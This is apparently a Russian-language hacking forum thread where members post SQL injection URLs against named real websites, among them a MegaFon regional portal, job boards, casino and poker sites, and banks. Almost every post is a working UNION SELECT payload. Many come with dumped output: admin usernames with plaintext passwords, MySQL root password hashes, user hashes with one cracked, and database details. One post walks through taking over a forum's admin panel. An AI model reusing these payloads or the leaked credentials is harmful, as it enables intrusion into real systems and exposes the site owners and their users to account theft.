Админим форум Мегафона Ну вобщем ничего сложного нет, поэтому выкладываю сюда, а там на рассмотрение модеров... вобщем нашел скулю: Code: http://bashkortostan.[B][COLOR=Red]megafonvolga.ru[/COLOR][/B]/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(user,':',password),4,5,6,7+from+mysql.user/* я думаю все знают, что это такое, но воспользоваться этим не получится, так как на серваке открыт только 80 порт (HTTP) увидел, что на серве есть форум (он относится, к всему мегафону поволжья), форум самописный, так, что пришлось воспользоваться интуицией и она меня не подвела: Code: http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,3,4,5,6,7+from+[B]forumusers[/B]/* дальше пришлось подбирать поля, почти во всех подобных таблицах есть поле id, остается только найти префикс (ну или типа этого). Опять же интуиция вкупе с логикой не подвели: Code: http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,[B]fu_id[/B],4,5,6,7+from+forumusers/* дальше подбирать поля - дело техники и вот конечный результат: Code: [B]http://bashkortostan.megafonvolga.ru/payment/dealers/&dtype=2&caid=187+union+select+1,2,concat(fu_name,':',fu_pwd),4,5,6,7+from+forumusers+where+fu_id=1/*[/B] как видим пароль в чистом виде, логинимся на форуме и становимся админами... для того, что б войти в панель админа надо нажать на ссылку "аватары" вверху появится окно бейсик авторизации, в него вводим эти же логин/пасс и админим форум... все... ЗЫ еще нашел там таблички: Code: news dealers phones PPS логин/пароль форума подходит к магазину
Code: http://www.butterslice.com/browsecats.php?cid=51%20union%20select%201,concat(sb_pwd,char(58),sb_pwd),3,4%20from%20sbjbs_admin/* pcquestnbcquestnb Code: http://www.ro-jobs.ro/browsecats.php?cid=48%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/* admin:q7w7e7r7 Code: http://ph.jobcentralasia.com/browsecats.php?cid=46%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/* admin:qwertyuiop Code: http://www.buljob.com/search_result.php?cid=970000%20union%20select%201,concat(sb_admin_name,char(58),sb_pwd),3,4%20from%20sbjbs_admin/* admin:I4ipBuOFUSuVaak2Y66*
Code: http://www.host.uzip.uz/search_result.php?cid=-10+union+select+1,VERSION(),3,4/* Code: http://www.all-horse-classifieds.com/browsecats.php?cid=-26+union+select+1,VERSION(),3,4,5/*
офсайт города Бельцы код: http://www.beltsy.md/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=-1+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12+from+sedoi_users/* ____________________________________________________________ www.seejob.md код: http://www.seejob.md/?page=view&t=0&id=-36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(table_name,0x3a,column_name),15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+limit+1374,1/*
Code: http://www.dandbpoker.com/book_detail.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,data base()),5,6,7,8,9,10,11,12,13,14/* [email protected]:4.1.22-standard-log:harakis Code: http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3 a,database()),4,5,6/*&parent= mediamarket@localhost:5.0.33:mmg_hpoker Code: http://www.h-poker.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,password),4,5 ,6+from+mys ql.user+limit+0,1/*&parent= root:*E459468099CBA6AEE7E679233A154F2DA83C23F8 banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B6E8307E1 mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B66CF7 Code: http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user(),0x3a,versio n(),0x3a,database()),4, 5,6/*& parent= mediamarket@localhost:5.0.33:mmg_pokertut Code: http://pokertut.com/newsitems/index.php?ticker=1&id=-1'/**/union/**/select/**/1,2,concat(user,0x3a,pa ssword),4,5,6 +from+mysql.us er/* &parent= root:*E459468099CBA6AEE7E679233A154F2DA83C23F8 banker_wwwbanker:*29DDF7AB5EA8618C8CEE26BD2A4D734B6E8307E1 mediamasters:*EB8A79A6B78AB470C3A37AAF085CEABAA5B66CF7 Code: http://www.casino-fr-bonus.com/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,vers ion(),0x3a,database()),6,7,8,9,10,11/* [email protected]:5.0.22-Debian_2-log:user9718a1 h*tp://www.grandscasinos.com /it/id.php?ID=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/* h*tp://www.casino-online-fr.com /ru/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11 h*tp://www.7casinoonline.com /it/es/id.php?ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11 h*tp://www.equipodepoker.com /index.php ' or 1=1/* h*tp://www.rakemeback.com /my-account/ ' or 1=1/*
DOS CREDO BANK код: http://www.credo.com.kg/news/?id=-8+union+select+1,cast(concat_ws(0x3a,version(),user(),database())+as+binary)/* ! HELP ! 5 мускул, но вывода колонок и таблиц через information_schema так и не смог! Что тут за заморочка?
starz.ru http://starz.ru/photo/?celeb=-64+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3/* uralmoto.ru логин/хеш/уин http://uralmoto.ru/stories.php?sid=-1'+union+select+1,2,3,4,5,concat(username,0x3a,user_password,0x3a,user_icq),7,8,9,10,11,12+from+phpbb_users+limit+1,1/* надеюсь не бояны ))
хеши: member:4e4d6c332b6fe62a63afe56171fd3725 расшифровал:haha ian:919b720497e91197077a706775c5a9ad adam:2e456fdbaadea50686a5809d9c540243 http://www.lanchesterbrassband.org.uk/login.php member:haha
Заказываем девочек ... код: http://elit.tv/index.phtml?id=-42+union+select+1,concat_ws(0x3a,id,name,passwd),3,4,5,6,7,8,9,10,11+from+admin_users/* ...но для начала нужно найти админку
ЗАО "МОССТРОЙЭКОНОМБАНК" Версия: 5.0.41-log usoftadmin:f02539ca4eff95f24c00d82eb62e275e:xtrfen mseb:6d390ae485e95ceac9ce280f02d0c409 Жаль обминку найти не смог (
http://www.vitz.ru/firms.php?cat=services&re=-58+union+select+1,2,3,concat(name,0x3a,password),icq_number,concat(ip_address,0x3a,email),7,8+from+vitz_forums.ibf_members/* Сразу вся база имя\хеш\уин\IP\email 5931 записей ) жаль что IPB (
4.1.21-standard barrowfc_results barrowfc_barrowf@localhost 4.0.24 enlajugada enlajugada@localhost 4.1.22-standard henrybcu_dbflatam henrybcu_f1lat07@localhost 5.0.45-community-log Sql154922_1 [email protected]
www.autozel.ru http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,database(),0x3a,user()),10,11,12,13/* 4.1.11:autozel1_aaaa:website@localhost http://www.autozel.ru/index.php?page=document&d_id=-5272+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,user_icq),5,6,7,8,9,10,11,12,13+from+phpbb_users+limit+1,1/* имя \ хеш \ уин